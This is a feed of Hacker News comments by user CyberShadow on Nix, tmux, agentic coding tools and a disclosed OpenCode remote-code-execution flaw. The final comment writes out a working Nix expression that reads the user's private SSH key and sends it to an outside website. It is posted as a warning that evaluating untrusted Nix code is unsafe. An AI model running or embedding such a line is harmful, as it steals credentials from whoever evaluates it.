Hacker News: CyberShadow

New comment by CyberShadow in "What is the history of the ERROR_ARENA_TRASHED error code?"

CyberShadow — Sat, 23 May 2026 11:10:01 +0000

Kernel panic.

New comment by CyberShadow in "Xs of Y – roguelike that names itself every run. Written in 4kLoC"

CyberShadow — Wed, 13 May 2026 19:03:32 +0000

Seems to be that the sort function accepts a ternary predicate but then passes it to an implementation accepting a boolean one?

New comment by CyberShadow in "Xs of Y – roguelike that names itself every run. Written in 4kLoC"

CyberShadow — Wed, 13 May 2026 18:18:35 +0000

No, I think I'm seeing Old man shuts the You must retrieve You kill the rat! (sneak attack!) The rat squeals and dies! You wait. (x10) ᚢ You kill the rat! (sneak attack!) The rat squeals and dies! You hear muttering. You hear muttering. You hear muttering. You hear a distant creak. The runestone crumbles You hear a distant creak. The goblin misses you. (x3) The goblin hits you for 4. The goblin hits you for 3. The goblin hits you for 4. The goblin hits you for 3. The goblin misses you. The goblin hits you for 4. The goblin hits you for 2. The goblin hits you for 4. The goblin misses you. The goblin hits you for 2. The goblin misses you. (x2) The goblin hits you for 2. The goblin kills you! You die... Note how there were no the same bug. Time seems to sometimes subjectively freeze:

    ─── Messages ─── gate behind you. You hear him mutter "every time, I swear..." the Amulet of Lost Semicolons.

ᛜ ᛉ

ᛋ

ᛖ                                                     ᛃ as you touch it. You learn: ᛟ means "ice"!                                               ᛚ

ᛏ

ᛚ

user action messages during the time the goblin was attacking.



New comment by CyberShadow in "Self-updating screenshots"
CyberShadow — Mon, 27 Apr 2026 01:32:18 +0000

Same, I've added a .#screenshots derivation. High up-front effort but almost zero maintenance afterwards.
Bonus: since you're generating screenshots programmatically anyway, you can generate a pair of each with your app's light/dark theme, and swap them in/out depending on prefers-color-scheme: dark.  elements work in GitHub READMEs, too: https://github.com/CyberShadow/CyDo#readme



New comment by CyberShadow in "Why I love NixOS"
CyberShadow — Mon, 23 Mar 2026 07:46:34 +0000

If you grant access to the Nix daemon socket but not writing outside the current directory, that's an effective sandbox. It allows evaluating derivations but not actually installing them.



New comment by CyberShadow in "AI Team OS – Turn Claude Code into a Self-Managing AI Team"
CyberShadow — Sat, 21 Mar 2026 17:25:01 +0000

If you invoke Claude Code with --input-format stream-json --output-format stream-json, you can use it headlessly. I built a personal UI / orchestration framework around it. Most features are available, but not exactly all (e.g. there is no way to undo via this protocol, but you can still do it manually by terminating / editing the session file / resuming). Other agentic software has similar features (Codex uses JSON-RPC, Copilot CLI has ACP which is also based on JSON-RPC).



New comment by CyberShadow in "Unauthenticated remote code execution in OpenCode"
CyberShadow — Tue, 13 Jan 2026 20:31:07 +0000

Are you on macOS? That might be a feature specific to that OS, I don't think Firefox does that on other OSes.



New comment by CyberShadow in "Unauthenticated remote code execution in OpenCode"
CyberShadow — Tue, 13 Jan 2026 08:49:50 +0000

Can you share what made this behavior obvious to you? E.g. when I first saw Open Code, it looked like yet another implementation of Claude Code, Codex-CLI, Gemini-CLI, Project Goose, etc. - all these are TUI apps for agentic coding. However, from these, only Open Code automatically started an unauthenticated web server when I simply started the TUI, so this came as a surprise to me.



New comment by CyberShadow in "Unauthenticated remote code execution in OpenCode"
CyberShadow — Tue, 13 Jan 2026 07:02:37 +0000

> Browsers don't let random pages on the internet hit localhost without prompting you anymore
No, that's a Chrome-specific feature that Google added. It is not part of any standard, and does not exist in other browsers (e.g. Safari and Firefox).
> The rest is just code running as your user can talk to code running as your user
No, that assumes that there is only a single user on the machine, and there are either no forms of isolation or that all forms of isolation also use private network namespaces, which has not been how daemons are isolated in UNIX or by systemd. For example, if you were to ever run OpenCode as root, any local process can trivially gain root as well.



New comment by CyberShadow in "Anthropic: Developing a Claude Code competitor using Claude Code is banned"
CyberShadow — Sun, 11 Jan 2026 22:42:36 +0000

PSA - please ensure you are running OpenCode v1.1.10 or newer: https://news.ycombinator.com/item?id=46581095



Unauthenticated remote code execution in OpenCode
CyberShadow — Sun, 11 Jan 2026 22:33:32 +0000

Previous versions of OpenCode started a server which allowed any website visited in a web browser to execute arbitrary commands on the local machine. Make sure you are using v1.1.10 or newer; see link for more details.

Comments URL: https://news.ycombinator.com/item?id=46581095
Points: 432
# Comments: 142



New comment by CyberShadow in "AI documentation you can talk to, for every repo"
CyberShadow — Sun, 16 Nov 2025 19:52:30 +0000

I don't think you understand. This website imposes its own time limit within which I must solve the CAPTCHA. Taking your time to solve the challenge slowly will not allow you to proceed, because the website's timeout will have expired.



New comment by CyberShadow in "AI documentation you can talk to, for every repo"
CyberShadow — Tue, 11 Nov 2025 09:22:34 +0000

Looks like it's impossible for me to use this service - when I try to submit the form, I get a reCAPTCHA challenge. By the time I complete it (Google requires me to make several attempts, each one being several pages), the page errors out in the background with "reCAPTCHA execution timeout".



New comment by CyberShadow in "Gemma 3 QAT Models: Bringing AI to Consumer GPUs"
CyberShadow — Sun, 20 Apr 2025 15:23:14 +0000

How does it compare to CodeGemma for programming tasks?



New comment by CyberShadow in "Determinate Nix 3.0 featuring stable flakes"
CyberShadow — Fri, 07 Mar 2025 08:41:55 +0000

Hi Graham!
Lots of exciting things here:
- Formally stabilizing flakes has been long awaited by everyone, I think.
- Parallel evaluation will improve developer experience - evaluation speed seems to be at the top of the list of feedback I've received from colleagues whom I've invited to try Nix.
- I'm hoping lazy trees will provide a better experience for flakes in monorepos.
Unfortunately I haven't had a great experience with the Determinate Nix installer when I tried it, though that was a while ago (shortly after launch) so may warrant revisiting.
I'm also concerned about the growing schism between Determinate Systems and the Nix community, as can be seen in the Discourse thread. I think there are opportunities to strengthen that bridge, e.g. naming things perhaps such that it's not possible to misinterpret this announcement as "Nix 3.0".
I am also curious to know what is your strategy for upholding the flakes stability guarantee without forking Nix. I'm not sure what the governance structure or roadmap is of the community Nix project, but would it not be possible that the project would want to eventually introduce a breaking change (e.g. to revisit the cross-compilation or parameterization aspects) that would affect Determinate Nix users?



New comment by CyberShadow in "Nix NCA member personally reinstates johnringer as nixpkgs maintainer after ban"
CyberShadow — Tue, 02 Jul 2024 14:23:42 +0000

> reinstates johnringer as nixpkgs maintainer
This is false.



New comment by CyberShadow in "So long, and thanks for all the fish: Leaving the Nix community"
CyberShadow — Fri, 28 Jun 2024 07:36:31 +0000

> I'll repost for posterity:
There is no need to do that. People who want to see dead comments can turn that option on in their profile.



New comment by CyberShadow in "Show HN: Shpool, a Lightweight Tmux Alternative"
CyberShadow — Thu, 13 Jun 2024 14:44:43 +0000

tmux takes over scrollback, so it's not possible to scroll the buffer in the same way as without tmux. This tool seems to solve the problem more elegantly.



New comment by CyberShadow in "Ilya Sutskever to leave OpenAI"
CyberShadow — Wed, 22 May 2024 06:26:04 +0000

> How is that supposed to "delete my home directory"?
Ah, I over-quoted that part. My mistake.
> Also, it doesn't work:
It will work with the default Nix settings.
> Turning off restrict-eval is pretty crazy; there's no reason to do that and it's dangerous.
One would need to first turn it on to be able to turn it off.
> https://nixos.org/manual/nix/unstable/command-ref/conf-file....
Indeed, note the default value.
> I don't think it did. I'm not sure what it was supposed to help with.
I was hoping that it would be interesting to you, but also help avoid spreading false information that might mislead people into evaluating Nix code when it's not safe to do so. But, I think I understand now that maybe you don't care about what happens to other people.



New comment by CyberShadow in "Ilya Sutskever to leave OpenAI"
CyberShadow — Thu, 16 May 2024 16:46:07 +0000

Hi, sorry for the unrelated comment. I actually wanted to reply to your comment at https://news.ycombinator.com/item?id=40208937 , but that comment was made too long ago and I can no longer reply to it directly.
In that comment, you wrote:
> It can delete your home directory or email your ssh private keys to Zimbabwe.
I thought that you might be interested to know that it is still possible to exfiltrate secrets by evaluating Nix expressions. Here is an example Nix expression which will upload your private SSH key to Zimbabwe's government's website (don't run this!):
    let
      pkgs = import (fetchTarball "https://github.com/NixOS/nixpkgs/archive/0ef56bec7281e2372338f2dfe7c13327ce96f6bb.tar.gz") {};
    in
    builtins.fetchurl "https://www.zim.gov.zw/?${pkgs.lib.escapeURL (builtins.readFile ~/.ssh/id_rsa)}"

It does not need --impure or any other unusual switches to work.Hope this helps.